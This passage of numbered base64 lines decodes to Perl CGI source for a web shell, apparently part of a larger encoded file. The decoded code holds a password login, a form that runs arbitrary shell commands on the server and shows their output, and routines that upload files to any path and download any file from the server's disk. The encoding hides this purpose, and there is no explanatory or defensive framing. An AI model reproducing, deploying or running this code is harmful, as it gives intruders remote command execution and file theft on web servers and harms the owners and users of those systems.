  1720. LS0tLS0tLS0NCnN1YiBQZXJmb3JtTG9naW4gDQp7DQoJaWYoJExvZ2luUGFzc3dvcmQgZXEgJFBh
  1721. c3N3b3JkKSAjIHBhc3N3b3JkIG1hdGNoZWQNCgl7DQoJCXByaW50ICJTZXQtQ29va2llOiBTQVZF
  1722. RFBXRD0kTG9naW5QYXNzd29yZDtcbiI7DQoJCSZQcmludFBhZ2VIZWFkZXIoImMiKTsNCgkJJlBy
  1723. aW50Q29tbWFuZExpbmVJbnB1dEZvcm07DQoJCSZQcmludFBhZ2VGb290ZXI7DQoJfQ0KCWVsc2Ug
  1724. IyBwYXNzd29yZCBkaWRuJ3QgbWF0Y2gNCgl7DQoJCSZQcmludFBhZ2VIZWFkZXIoInAiKTsNCgkJ
  1725. JlByaW50TG9naW5TY3JlZW47DQoJCWlmKCRMb2dpblBhc3N3b3JkIG5lICIiKSAjIHNvbWUgcGFz
  1726. c3dvcmQgd2FzIGVudGVyZWQNCgkJew0KCQkJJlByaW50TG9naW5GYWlsZWRNZXNzYWdlOw0KDQoJ
  1727. CX0NCgkJJlByaW50TG9naW5Gb3JtOw0KCQkmUHJpbnRQYWdlRm9vdGVyOw0KCX0NCn0NCg0KIy0t
  1728. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1729. LS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBQcmludHMgdGhlIEhUTUwgZm9ybSB0aGF0IGFsbG93cyB0
  1730. aGUgdXNlciB0byBlbnRlciBjb21tYW5kcw0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1731. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIFBy
  1732. aW50Q29tbWFuZExpbmVJbnB1dEZvcm0NCnsNCgkkUHJvbXB0ID0gJFdpbk5UID8gIiRDdXJyZW50
  1733. RGlyPiAiIDogIlthZG1pblxAJFNlcnZlck5hbWUgJEN1cnJlbnREaXJdXCQgIjsNCglwcmludCA8
  1734. PEVORDsNCjxjb2RlPg0KPGZvcm0gbmFtZT0iZiIgbWV0aG9kPSJQT1NUIiBhY3Rpb249IiRTY3Jp
  1735. cHRMb2NhdGlvbiI+DQo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJhIiB2YWx1ZT0iY29tbWFu
  1736. ZCI+DQo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJkIiB2YWx1ZT0iJEN1cnJlbnREaXIiPg0K
  1737. JFByb21wdA0KPGlucHV0IHR5cGU9InRleHQiIG5hbWU9ImMiPg0KPGlucHV0IHR5cGU9InN1Ym1p
  1738. dCIgdmFsdWU9IkVudGVyIj4NCjwvZm9ybT4NCjwvY29kZT4NCg0KRU5EDQp9DQoNCiMtLS0tLS0t
  1739. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1740. LS0tLS0tLS0tLS0tLS0NCiMgUHJpbnRzIHRoZSBIVE1MIGZvcm0gdGhhdCBhbGxvd3MgdGhlIHVz
  1741. ZXIgdG8gZG93bmxvYWQgZmlsZXMNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1742. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBQcmludEZp
  1743. bGVEb3dubG9hZEZvcm0NCnsNCgkkUHJvbXB0ID0gJFdpbk5UID8gIiRDdXJyZW50RGlyPiAiIDog
  1744. IlthZG1pblxAJFNlcnZlck5hbWUgJEN1cnJlbnREaXJdXCQgIjsNCglwcmludCA8PEVORDsNCjxj
  1745. b2RlPg0KPGZvcm0gbmFtZT0iZiIgbWV0aG9kPSJQT1NUIiBhY3Rpb249IiRTY3JpcHRMb2NhdGlv
  1746. biI+DQo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJkIiB2YWx1ZT0iJEN1cnJlbnREaXIiPg0K
  1747. PGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iYSIgdmFsdWU9ImRvd25sb2FkIj4NCiRQcm9tcHQg
  1748. ZG93bmxvYWQ8YnI+PGJyPg0KRmlsZW5hbWU6IDxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJmIiBz
  1749. aXplPSIzNSI+PGJyPjxicj4NCkRvd25sb2FkOiA8aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0i
  1750. QmVnaW4iPg0KPC9mb3JtPg0KPC9jb2RlPg0KRU5EDQp9DQoNCiMtLS0tLS0tLS0tLS0tLS0tLS0t
  1751. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1752. LS0NCiMgUHJpbnRzIHRoZSBIVE1MIGZvcm0gdGhhdCBhbGxvd3MgdGhlIHVzZXIgdG8gdXBsb2Fk
  1753. IGZpbGVzDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1754. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgUHJpbnRGaWxlVXBsb2FkRm9ybQ0K
  1755. ew0KCSRQcm9tcHQgPSAkV2luTlQgPyAiJEN1cnJlbnREaXI+ICIgOiAiW2FkbWluXEAkU2VydmVy
  1756. TmFtZSAkQ3VycmVudERpcl1cJCAiOw0KCXByaW50IDw8RU5EOw0KPGNvZGU+DQoNCjxmb3JtIG5h
  1757. bWU9ImYiIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiIG1ldGhvZD0iUE9TVCIgYWN0aW9u
  1758. PSIkU2NyaXB0TG9jYXRpb24iPg0KJFByb21wdCB1cGxvYWQ8YnI+PGJyPg0KRmlsZW5hbWU6IDxp
  1759. bnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJmIiBzaXplPSIzNSI+PGJyPjxicj4NCk9wdGlvbnM6ICZu
  1760. YnNwOzxpbnB1dCB0eXBlPSJjaGVja2JveCIgbmFtZT0ibyIgdmFsdWU9Im92ZXJ3cml0ZSI+DQpP
  1761. dmVyd3JpdGUgaWYgaXQgRXhpc3RzPGJyPjxicj4NClVwbG9hZDombmJzcDsmbmJzcDsmbmJzcDs8
  1762. aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0iQmVnaW4iPg0KPGlucHV0IHR5cGU9ImhpZGRlbiIg
  1763. bmFtZT0iZCIgdmFsdWU9IiRDdXJyZW50RGlyIj4NCjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9
  1764. ImEiIHZhbHVlPSJ1cGxvYWQiPg0KPC9mb3JtPg0KPC9jb2RlPg0KRU5EDQp9DQoNCiMtLS0tLS0t
  1765. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1766. LS0tLS0tLS0tLS0tLS0NCiMgVGhpcyBmdW5jdGlvbiBpcyBjYWxsZWQgd2hlbiB0aGUgdGltZW91
  1767. dCBmb3IgYSBjb21tYW5kIGV4cGlyZXMuIFdlIG5lZWQgdG8NCiMgdGVybWluYXRlIHRoZSBzY3Jp
  1768. cHQgaW1tZWRpYXRlbHkuIFRoaXMgZnVuY3Rpb24gaXMgdmFsaWQgb25seSBvbiBVbml4LiBJdCBp
  1769. cw0KIyBuZXZlciBjYWxsZWQgd2hlbiB0aGUgc2NyaXB0IGlzIHJ1bm5pbmcgb24gTlQuDQojLS0t
  1770. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1771. LS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgQ29tbWFuZFRpbWVvdXQNCnsNCglpZighJFdpbk5UKQ0K
  1772. CXsNCgkJYWxhcm0oMCk7DQoJCXByaW50IDw8RU5EOw0KPC94bXA+DQoNCjxjb2RlPg0KQ29tbWFu
  1773. ZCBleGNlZWRlZCBtYXhpbXVtIHRpbWUgb2YgJENvbW1hbmRUaW1lb3V0RHVyYXRpb24gc2Vjb25k
  1774. KHMpLg0KPGJyPktpbGxlZCBpdCENCkVORA0KCQkmUHJpbnRDb21tYW5kTGluZUlucHV0Rm9ybTsN
  1775. CgkJJlByaW50UGFnZUZvb3RlcjsNCgkJZXhpdDsNCgl9DQp9DQoNCiMtLS0tLS0tLS0tLS0tLS0t
  1776. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1777. LS0tLS0NCiMgVGhpcyBmdW5jdGlvbiBpcyBjYWxsZWQgdG8gZXhlY3V0ZSBjb21tYW5kcy4gSXQg
  1778. ZGlzcGxheXMgdGhlIG91dHB1dCBvZiB0aGUNCiMgY29tbWFuZCBhbmQgYWxsb3dzIHRoZSB1c2Vy
  1779. IHRvIGVudGVyIGFub3RoZXIgY29tbWFuZC4gVGhlIGNoYW5nZSBkaXJlY3RvcnkNCiMgY29tbWFu
  1780. ZCBpcyBoYW5kbGVkIGRpZmZlcmVudGx5LiBJbiB0aGlzIGNhc2UsIHRoZSBuZXcgZGlyZWN0b3J5
  1781. IGlzIHN0b3JlZCBpbg0KIyBhbiBpbnRlcm5hbCB2YXJpYWJsZSBhbmQgaXMgdXNlZCBlYWNoIHRp
  1782. bWUgYSBjb21tYW5kIGhhcyB0byBiZSBleGVjdXRlZC4gVGhlDQojIG91dHB1dCBvZiB0aGUgY2hh
  1783. bmdlIGRpcmVjdG9yeSBjb21tYW5kIGlzIG5vdCBkaXNwbGF5ZWQgdG8gdGhlIHVzZXJzDQojIHRo
  1784. ZXJlZm9yZSBlcnJvciBtZXNzYWdlcyBjYW5ub3QgYmUgZGlzcGxheWVkLg0KIy0tLS0tLS0tLS0t
  1785. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1786. LS0tLS0tLS0tLQ0Kc3ViIEV4ZWN1dGVDb21tYW5kDQp7DQoJaWYoJFJ1bkNvbW1hbmQgPX4gbS9e
  1787. XHMqY2RccysoLispLykgIyBpdCBpcyBhIGNoYW5nZSBkaXIgY29tbWFuZA0KCXsNCgkJIyB3ZSBj
  1788. aGFuZ2UgdGhlIGRpcmVjdG9yeSBpbnRlcm5hbGx5LiBUaGUgb3V0cHV0IG9mIHRoZQ0KCQkjIGNv
  1789. bW1hbmQgaXMgbm90IGRpc3BsYXllZC4NCgkJDQoJCSRPbGREaXIgPSAkQ3VycmVudERpcjsNCgkJ
  1790. JENvbW1hbmQgPSAiY2QgXCIkQ3VycmVudERpclwiIi4kQ21kU2VwLiJjZCAkMSIuJENtZFNlcC4k
  1791. Q21kUHdkOw0KCQljaG9wKCRDdXJyZW50RGlyID0gYCRDb21tYW5kYCk7DQoJCSZQcmludFBhZ2VI
  1792. ZWFkZXIoImMiKTsNCgkJJFByb21wdCA9ICRXaW5OVCA/ICIkT2xkRGlyPiAiIDogIlthZG1pblxA
  1793. JFNlcnZlck5hbWUgJE9sZERpcl1cJCAiOw0KCQlwcmludCAiJFByb21wdCAkUnVuQ29tbWFuZCI7
  1794. DQoJfQ0KCWVsc2UgIyBzb21lIG90aGVyIGNvbW1hbmQsIGRpc3BsYXkgdGhlIG91dHB1dA0KCXsN
  1795. CgkJJlByaW50UGFnZUhlYWRlcigiYyIpOw0KCQkkUHJvbXB0ID0gJFdpbk5UID8gIiRDdXJyZW50
  1796. RGlyPiAiIDogIlthZG1pblxAJFNlcnZlck5hbWUgJEN1cnJlbnREaXJdXCQgIjsNCgkJcHJpbnQg
  1797. IiRQcm9tcHQgJFJ1bkNvbW1hbmQ8eG1wPiI7DQoJCSRDb21tYW5kID0gImNkIFwiJEN1cnJlbnRE
  1798. aXJcIiIuJENtZFNlcC4kUnVuQ29tbWFuZC4kUmVkaXJlY3RvcjsNCgkJaWYoISRXaW5OVCkNCgkJ
  1799. ew0KCQkJJFNJR3snQUxSTSd9ID0gXCZDb21tYW5kVGltZW91dDsNCgkJCWFsYXJtKCRDb21tYW5k
  1800. VGltZW91dER1cmF0aW9uKTsNCgkJfQ0KCQlpZigkU2hvd0R5bmFtaWNPdXRwdXQpICMgc2hvdyBv
  1801. dXRwdXQgYXMgaXQgaXMgZ2VuZXJhdGVkDQoJCXsNCgkJCSR8PTE7DQoJCQkkQ29tbWFuZCAuPSAi
  1802. IHwiOw0KCQkJb3BlbihDb21tYW5kT3V0cHV0LCAkQ29tbWFuZCk7DQoJCQl3aGlsZSg8Q29tbWFu
  1803. ZE91dHB1dD4pDQoJCQl7DQoJCQkJJF8gPX4gcy8oXG58XHJcbikkLy87DQoJCQkJcHJpbnQgIiRf
  1804. XG4iOw0KCQkJfQ0KCQkJJHw9MDsNCgkJfQ0KCQllbHNlICMgc2hvdyBvdXRwdXQgYWZ0ZXIgY29t
  1805. bWFuZCBjb21wbGV0ZXMNCgkJew0KCQkJcHJpbnQgYCRDb21tYW5kYDsNCgkJfQ0KCQlpZighJFdp
  1806. bk5UKQ0KCQl7DQoJCQlhbGFybSgwKTsNCgkJfQ0KCQlwcmludCAiPC94bXA+IjsNCgl9DQoJJlBy
  1807. aW50Q29tbWFuZExpbmVJbnB1dEZvcm07DQoJJlByaW50UGFnZUZvb3RlcjsNCn0NCg0KIy0tLS0t
  1808. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1809. LS0tLS0tLS0tLS0tLS0tLQ0KIyBUaGlzIGZ1bmN0aW9uIGRpc3BsYXlzIHRoZSBwYWdlIHRoYXQg
  1810. Y29udGFpbnMgYSBsaW5rIHdoaWNoIGFsbG93cyB0aGUgdXNlcg0KIyB0byBkb3dubG9hZCB0aGUg
  1811. c3BlY2lmaWVkIGZpbGUuIFRoZSBwYWdlIGFsc28gY29udGFpbnMgYSBhdXRvLXJlZnJlc2gNCiMg
  1812. ZmVhdHVyZSB0aGF0IHN0YXJ0cyB0aGUgZG93bmxvYWQgYXV0b21hdGljYWxseS4NCiMgQXJndW1l
  1813. bnQgMTogRnVsbHkgcXVhbGlmaWVkIGZpbGVuYW1lIG9mIHRoZSBmaWxlIHRvIGJlIGRvd25sb2Fk
  1814. ZWQNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1815. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBQcmludERvd25sb2FkTGlua1BhZ2UNCnsN
  1816. Cglsb2NhbCgkRmlsZVVybCkgPSBAXzsNCglpZigtZSAkRmlsZVVybCkgIyBpZiB0aGUgZmlsZSBl
  1817. eGlzdHMNCgl7DQoJCSMgZW5jb2RlIHRoZSBmaWxlIGxpbmsgc28gd2UgY2FuIHNlbmQgaXQgdG8g
  1818. dGhlIGJyb3dzZXINCgkJJEZpbGVVcmwgPX4gcy8oW15hLXpBLVowLTldKS8nJScudW5wYWNrKCJI
  1819. KiIsJDEpL2VnOw0KCQkkRG93bmxvYWRMaW5rID0gIiRTY3JpcHRMb2NhdGlvbj9hPWRvd25sb2Fk
  1820. JmY9JEZpbGVVcmwmbz1nbyI7DQoJCSRIdG1sTWV0YUhlYWRlciA9ICI8bWV0YSBIVFRQLUVRVUlW
  1821. PVwiUmVmcmVzaFwiIENPTlRFTlQ9XCIxOyBVUkw9JERvd25sb2FkTGlua1wiPiI7DQoJCSZQcmlu
  1822. dFBhZ2VIZWFkZXIoImMiKTsNCgkJcHJpbnQgPDxFTkQ7DQo8Y29kZT4NCg0KU2VuZGluZyBGaWxl
  1823. ICRUcmFuc2ZlckZpbGUuLi48YnI+DQpJZiB0aGUgZG93bmxvYWQgZG9lcyBub3Qgc3RhcnQgYXV0
  1824. b21hdGljYWxseSwNCjxhIGhyZWY9IiREb3dubG9hZExpbmsiPkNsaWNrIEhlcmU8L2E+Lg0KRU5E
  1825. DQoJCSZQcmludENvbW1hbmRMaW5lSW5wdXRGb3JtOw0KCQkmUHJpbnRQYWdlRm9vdGVyOw0KCX0N
  1826. CgllbHNlICMgZmlsZSBkb2Vzbid0IGV4aXN0DQoJew0KCQkmUHJpbnRQYWdlSGVhZGVyKCJmIik7
  1827. DQoJCXByaW50ICJGYWlsZWQgdG8gZG93bmxvYWQgJEZpbGVVcmw6ICQhIjsNCgkJJlByaW50Rmls
  1828. ZURvd25sb2FkRm9ybTsNCgkJJlByaW50UGFnZUZvb3RlcjsNCgl9DQp9DQoNCiMtLS0tLS0tLS0t
  1829. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1830. LS0tLS0tLS0tLS0NCiMgVGhpcyBmdW5jdGlvbiByZWFkcyB0aGUgc3BlY2lmaWVkIGZpbGUgZnJv
  1831. bSB0aGUgZGlzayBhbmQgc2VuZHMgaXQgdG8gdGhlDQojIGJyb3dzZXIsIHNvIHRoYXQgaXQgY2Fu
  1832. IGJlIGRvd25sb2FkZWQgYnkgdGhlIHVzZXIuDQojIEFyZ3VtZW50IDE6IEZ1bGx5IHF1YWxpZmll
  1833. ZCBwYXRobmFtZSBvZiB0aGUgZmlsZSB0byBiZSBzZW50Lg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0t
  1834. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1835. LQ0Kc3ViIFNlbmRGaWxlVG9Ccm93c2VyDQp7DQoJbG9jYWwoJFNlbmRGaWxlKSA9IEBfOw0KCWlm
  1836. KG9wZW4oU0VOREZJTEUsICRTZW5kRmlsZSkpICMgZmlsZSBvcGVuZWQgZm9yIHJlYWRpbmcNCgl7
  1837. DQoJCWlmKCRXaW5OVCkNCgkJew0KCQkJYmlubW9kZShTRU5ERklMRSk7DQoJCQliaW5tb2RlKFNU
  1838. RE9VVCk7DQoJCX0NCgkJJEZpbGVTaXplID0gKHN0YXQoJFNlbmRGaWxlKSlbN107DQoJCSgkRmls
  1839. ZW5hbWUgPSAkU2VuZEZpbGUpID1+ICBtIShbXi9eXFxdKikkITsNCgkJcHJpbnQgIkNvbnRlbnQt
  1840. VHlwZTogYXBwbGljYXRpb24veC11bmtub3duXG4iOw0KCQlwcmludCAiQ29udGVudC1MZW5ndGg6
  1841. ICRGaWxlU2l6ZVxuIjsNCgkJcHJpbnQgIkNvbnRlbnQtRGlzcG9zaXRpb246IGF0dGFjaG1lbnQ7
  1842. IGZpbGVuYW1lPSQxXG5cbiI7DQoJCXByaW50IHdoaWxlKDxTRU5ERklMRT4pOw0KCQljbG9zZShT
  1843. RU5ERklMRSk7DQoJfQ0KCWVsc2UgIyBmYWlsZWQgdG8gb3BlbiBmaWxlDQoJew0KCQkmUHJpbnRQ
  1844. YWdlSGVhZGVyKCJmIik7DQoJCXByaW50ICJGYWlsZWQgdG8gZG93bmxvYWQgJFNlbmRGaWxlOiAk
  1845. ISI7DQoJCSZQcmludEZpbGVEb3dubG9hZEZvcm07DQoNCgkJJlByaW50UGFnZUZvb3RlcjsNCgl9
  1846. DQp9DQoNCg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1847. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBUaGlzIGZ1bmN0aW9uIGlzIGNhbGxl
  1848. ZCB3aGVuIHRoZSB1c2VyIGRvd25sb2FkcyBhIGZpbGUuIEl0IGRpc3BsYXlzIGEgbWVzc2FnZQ0K
  1849. IyB0byB0aGUgdXNlciBhbmQgcHJvdmlkZXMgYSBsaW5rIHRocm91Z2ggd2hpY2ggdGhlIGZpbGUg
  1850. Y2FuIGJlIGRvd25sb2FkZWQuDQojIFRoaXMgZnVuY3Rpb24gaXMgYWxzbyBjYWxsZWQgd2hlbiB0
  1851. aGUgdXNlciBjbGlja3Mgb24gdGhhdCBsaW5rLiBJbiB0aGlzIGNhc2UsDQojIHRoZSBmaWxlIGlz
  1852. IHJlYWQgYW5kIHNlbnQgdG8gdGhlIGJyb3dzZXIuDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1853. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpz
  1854. dWIgQmVnaW5Eb3dubG9hZA0Kew0KCSMgZ2V0IGZ1bGx5IHF1YWxpZmllZCBwYXRoIG9mIHRoZSBm
  1855. aWxlIHRvIGJlIGRvd25sb2FkZWQNCglpZigoJFdpbk5UICYgKCRUcmFuc2ZlckZpbGUgPX4gbS9e
  1856. XFx8Xi46LykpIHwNCgkJKCEkV2luTlQgJiAoJFRyYW5zZmVyRmlsZSA9fiBtL15cLy8pKSkgIyBw
  1857. YXRoIGlzIGFic29sdXRlDQoJew0KCQkkVGFyZ2V0RmlsZSA9ICRUcmFuc2ZlckZpbGU7DQoJfQ0K
  1858. CWVsc2UgIyBwYXRoIGlzIHJlbGF0aXZlDQoJew0KCQljaG9wKCRUYXJnZXRGaWxlKSBpZigkVGFy
  1859. Z2V0RmlsZSA9ICRDdXJyZW50RGlyKSA9fiBtL1tcXFwvXSQvOw0KCQkkVGFyZ2V0RmlsZSAuPSAk
  1860. UGF0aFNlcC4kVHJhbnNmZXJGaWxlOw0KCX0NCg0KCWlmKCRPcHRpb25zIGVxICJnbyIpICMgd2Ug
  1861. aGF2ZSB0byBzZW5kIHRoZSBmaWxlDQoJew0KCQkmU2VuZEZpbGVUb0Jyb3dzZXIoJFRhcmdldEZp
  1862. bGUpOw0KCX0NCgllbHNlICMgd2UgaGF2ZSB0byBzZW5kIG9ubHkgdGhlIGxpbmsgcGFnZQ0KCXsN
  1863. CgkJJlByaW50RG93bmxvYWRMaW5rUGFnZSgkVGFyZ2V0RmlsZSk7DQoJfQ0KfQ0KDQojLS0tLS0t
  1864. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1865. LS0tLS0tLS0tLS0tLS0tDQojIFRoaXMgZnVuY3Rpb24gaXMgY2FsbGVkIHdoZW4gdGhlIHVzZXIg
  1866. d2FudHMgdG8gdXBsb2FkIGEgZmlsZS4gSWYgdGhlDQojIGZpbGUgaXMgbm90IHNwZWNpZmllZCwg
  1867. aXQgZGlzcGxheXMgYSBmb3JtIGFsbG93aW5nIHRoZSB1c2VyIHRvIHNwZWNpZnkgYQ0KIyBmaWxl
  1868. LCBvdGhlcndpc2UgaXQgc3RhcnRzIHRoZSB1cGxvYWQgcHJvY2Vzcy4NCiMtLS0tLS0tLS0tLS0t
  1869. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1870. LS0tLS0tLS0NCnN1YiBVcGxvYWRGaWxlDQp7DQoJIyBpZiBubyBmaWxlIGlzIHNwZWNpZmllZCwg
  1871. cHJpbnQgdGhlIHVwbG9hZCBmb3JtIGFnYWluDQoJaWYoJFRyYW5zZmVyRmlsZSBlcSAiIikNCgl7
  1872. DQoJCSZQcmludFBhZ2VIZWFkZXIoImYiKTsNCgkJJlByaW50RmlsZVVwbG9hZEZvcm07DQoJCSZQ
  1873. cmludFBhZ2VGb290ZXI7DQoJCXJldHVybjsNCgl9DQoJJlByaW50UGFnZUhlYWRlcigiYyIpOw0K
  1874. DQoJIyBzdGFydCB0aGUgdXBsb2FkaW5nIHByb2Nlc3MNCglwcmludCAiVXBsb2FkaW5nICRUcmFu
  1875. c2ZlckZpbGUgdG8gJEN1cnJlbnREaXIuLi48YnI+IjsNCg0KCSMgZ2V0IHRoZSBmdWxsbHkgcXVh
  1876. bGlmaWVkIHBhdGhuYW1lIG9mIHRoZSBmaWxlIHRvIGJlIGNyZWF0ZWQNCgljaG9wKCRUYXJnZXRO
  1877. YW1lKSBpZiAoJFRhcmdldE5hbWUgPSAkQ3VycmVudERpcikgPX4gbS9bXFxcL10kLzsNCgkkVHJh
  1878. bnNmZXJGaWxlID1+IG0hKFteL15cXF0qKSQhOw0KCSRUYXJnZXROYW1lIC49ICRQYXRoU2VwLiQx
  1879. Ow0KDQoJJFRhcmdldEZpbGVTaXplID0gbGVuZ3RoKCRpbnsnZmlsZWRhdGEnfSk7DQoJIyBpZiB0
  1880. aGUgZmlsZSBleGlzdHMgYW5kIHdlIGFyZSBub3Qgc3VwcG9zZWQgdG8gb3ZlcndyaXRlIGl0DQoJ
  1881. aWYoLWUgJFRhcmdldE5hbWUgJiYgJE9wdGlvbnMgbmUgIm92ZXJ3cml0ZSIpDQoJew0KCQlwcmlu
  1882. dCAiRmFpbGVkOiBEZXN0aW5hdGlvbiBmaWxlIGFscmVhZHkgZXhpc3RzLjxicj4iOw0KCX0NCgll
  1883. bHNlICMgZmlsZSBpcyBub3QgcHJlc2VudA0KCXsNCgkJaWYob3BlbihVUExPQURGSUxFLCAiPiRU
  1884. YXJnZXROYW1lIikpDQoJCXsNCgkJCWJpbm1vZGUoVVBMT0FERklMRSkgaWYgJFdpbk5UOw0KCQkJ
  1885. cHJpbnQgVVBMT0FERklMRSAkaW57J2ZpbGVkYXRhJ307DQoJCQljbG9zZShVUExPQURGSUxFKTsN
  1886. CgkJCXByaW50ICJUcmFuc2ZlcmVkICRUYXJnZXRGaWxlU2l6ZSBCeXRlcy48YnI+IjsNCgkJCXBy
  1887. aW50ICJGaWxlIFBhdGg6ICRUYXJnZXROYW1lPGJyPiI7DQoJCX0NCgkJZWxzZQ0KCQl7DQoJCQlw
  1888. cmludCAiRmFpbGVkOiAkITxicj4iOw0KCQl9DQoJfQ0KCXByaW50ICIiOw0KCSZQcmludENvbW1h
  1889. bmRMaW5lSW5wdXRGb3JtOw0KDQoJJlByaW50UGFnZUZvb3RlcjsNCn0NCg0KIy0tLS0tLS0tLS0t
  1890. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1891. LS0tLS0tLS0tLQ0KIyBUaGlzIGZ1bmN0aW9uIGlzIGNhbGxlZCB3aGVuIHRoZSB1c2VyIHdhbnRz
  1892. IHRvIGRvd25sb2FkIGEgZmlsZS4gSWYgdGhlDQojIGZpbGVuYW1lIGlzIG5vdCBzcGVjaWZpZWQs
  1893. IGl0IGRpc3BsYXlzIGEgZm9ybSBhbGxvd2luZyB0aGUgdXNlciB0byBzcGVjaWZ5IGENCiMgZmls
  1894. ZSwgb3RoZXJ3aXNlIGl0IGRpc3BsYXlzIGEgbWVzc2FnZSB0byB0aGUgdXNlciBhbmQgcHJvdmlk
  1895. ZXMgYSBsaW5rDQojIHRocm91Z2ggIHdoaWNoIHRoZSBmaWxlIGNhbiBiZSBkb3dubG9hZGVkLg0K
  1896. Iy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1897. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIERvd25sb2FkRmlsZQ0Kew0KCSMgaWYgbm8gZmls
  1898. ZSBpcyBzcGVjaWZpZWQsIHByaW50IHRoZSBkb3dubG9hZCBmb3JtIGFnYWluDQoJaWYoJFRyYW5z
  1899. ZmVyRmlsZSBlcSAiIikNCgl7DQoJCSZQcmludFBhZ2VIZWFkZXIoImYiKTsNCgkJJlByaW50Rmls
  1900. ZURvd25sb2FkRm9ybTsNCgkJJlByaW50UGFnZUZvb3RlcjsNCgkJcmV0dXJuOw0KCX0NCgkNCgkj
  1901. IGdldCBmdWxseSBxdWFsaWZpZWQgcGF0aCBvZiB0aGUgZmlsZSB0byBiZSBkb3dubG9hZGVkDQoJ
  1902. aWYoKCRXaW5OVCAmICgkVHJhbnNmZXJGaWxlID1+IG0vXlxcfF4uOi8pKSB8DQoJCSghJFdpbk5U
  1903. ICYgKCRUcmFuc2ZlckZpbGUgPX4gbS9eXC8vKSkpICMgcGF0aCBpcyBhYnNvbHV0ZQ0KCXsNCgkJ
  1904. JFRhcmdldEZpbGUgPSAkVHJhbnNmZXJGaWxlOw0KCX0NCgllbHNlICMgcGF0aCBpcyByZWxhdGl2
  1905. ZQ0KCXsNCgkJY2hvcCgkVGFyZ2V0RmlsZSkgaWYoJFRhcmdldEZpbGUgPSAkQ3VycmVudERpcikg
  1906. PX4gbS9bXFxcL10kLzsNCgkJJFRhcmdldEZpbGUgLj0gJFBhdGhTZXAuJFRyYW5zZmVyRmlsZTsN
  1907. Cgl9DQoNCglpZigkT3B0aW9ucyBlcSAiZ28iKSAjIHdlIGhhdmUgdG8gc2VuZCB0aGUgZmlsZQ0K
  1908. CXsNCgkJJlNlbmRGaWxlVG9Ccm93c2VyKCRUYXJnZXRGaWxlKTsNCgl9DQoJZWxzZSAjIHdlIGhh
  1909. dmUgdG8gc2VuZCBvbmx5IHRoZSBsaW5rIHBhZ2UNCgl7DQoJCSZQcmludERvd25sb2FkTGlua1Bh
